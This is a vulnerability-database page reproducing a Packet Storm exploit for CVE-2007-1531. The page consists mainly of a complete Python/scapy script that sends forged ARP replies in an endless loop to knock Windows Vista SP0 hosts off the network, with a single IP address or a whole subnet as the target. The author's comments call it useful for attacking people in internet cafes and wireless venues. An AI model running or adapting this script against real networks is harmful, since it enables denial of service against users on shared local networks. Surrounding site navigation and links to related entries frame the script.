Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKristian HermansenPACKETSTORM:56759
HistoryMay 16, 2007 - 12:00 a.m.

arp-dos.txt

2007-05-1600:00:00
Kristian Hermansen
packetstormsecurity.com
18

0.498 Medium

EPSS

Percentile

97.5%

JSON
`#!/usr/bin/env python  
#  
# :: Kristian Hermansen ::  
# Date: 20070514  
# Reference: CVE-2007-1531  
# Description: Microsoft Windows Vista (SP0) dumps interfaces when  
# it receives this ARP packet. This DoS is useful for an internet  
# cafe, wireless venue, or legitimate local attack. The victim will  
# need to manually refresh their network interface. OK, sure  
# it's a dumb local attack, but why does Vista disable iface!?!??  
# -> Thanks to Newsham / Hoagland  
# Vulnerable: Microsoft Windows Vista (SP0) [All Versions]  
# Tested:  
# * victim == Windows Vista Enterprise (SP0) [English]  
# * attacker == Ubuntu Feisty (7.04)  
# Usage: python fISTArp.py <victim>  
# Depends: scapy.py  
# [?] If you don't have scapy  
# [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py  
  
from sys import argv  
from os import geteuid  
from scapy import Ether,ARP,send,srp,conf  
from time import sleep  
  
conf.verb = 0  
  
def head():  
print """  
__ ___ ____ _____ _   
/ _|_ _/ ___|_ _|/ \ _ __ _ __   
| |_ | |\___ \ | | / _ \ | '__| '_ \   
| _|| | ___) || |/ ___ \| | | |_) |  
|_| |___|____/ |_/_/ \_\_| | .__/   
|_|   
  
"""  
  
def isroot():  
if geteuid() != 0:  
print "TRY AGAIN AS ROOT SILLY..."  
return False  
else:  
return True  
  
def usage():  
print "usage:", argv[0], "<victim(s)>"  
print "examples:", argv[0], "192.168.1.100"  
print "examples:", argv[0], "192.168.1.0/24\n"  
  
def fisting():  
arp_fist = ARP(pdst=argv[1],op=2)  
print "We are going to loop forever, CTRL-C to stop...\n"  
while True:  
sleep(3)  
for a in arp_fist:  
arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)  
ans,unans = srp(arping,timeout=0.1)  
if len(ans) == 1:  
a.psrc=a.pdst  
print a.pdst, "is ALIVE!"  
print "* Time to shut it down!"  
send(a)  
ans2,unans2 = srp(arping,timeout=0.1)  
if len(unans2) == 1:  
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"  
print "@@@", a.psrc, "was rubber fisted!"  
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"  
sleep(3)  
else:  
print "FAILED:", a.pdst, "is still alive :-("  
else:  
print a.pdst, "is already DEAD!"  
print  
  
head()  
if isroot() != True:  
exit(1)  
if len(argv) != 2:  
usage()  
exit(1)  
else:  
fisting()  
  
# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.  
`

Related

exploitpack 2
nvd 1
seebug 3
cvelist 1
cve 1
prion 1
exploitdb 2
securityvulns 1
exploitpack
exploitpack
Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service
2007-05-15 00:00:00
Microsoft Windows Vista - ARP Table Entries Denial of Service
2004-04-02 00:00:00
nvd
nvd
CVE-2007-1531
2007-03-20 20:19:00
seebug
seebug
MS Windows Vista - Forged ARP packet Network Stack DoS Exploit
2014-07-01 00:00:00
MS Windows Vista forged ARP packet Network Stack DoS Exploit
2007-05-15 00:00:00
Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability
2014-07-01 00:00:00
cvelist
cvelist
CVE-2007-1531
2007-03-20 20:00:00
cve
cve
CVE-2007-1531
2007-03-20 20:19:00
prion
prion
Design/Logic Flaw
2007-03-20 20:19:00
exploitdb
exploitdb
Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service
2007-05-15 00:00:00
Microsoft Windows Vista - ARP Table Entries Denial of Service
2004-04-02 00:00:00
securityvulns
securityvulns
Microsoft Vista IPv6 multiple security vulnerability
2007-04-04 00:00:00

0.498 Medium

EPSS

Percentile

97.5%

JSON
Related for PACKETSTORM:56759
exploitpack2nvd1seebug3cvelist1cve1prion1exploitdb2securityvulns1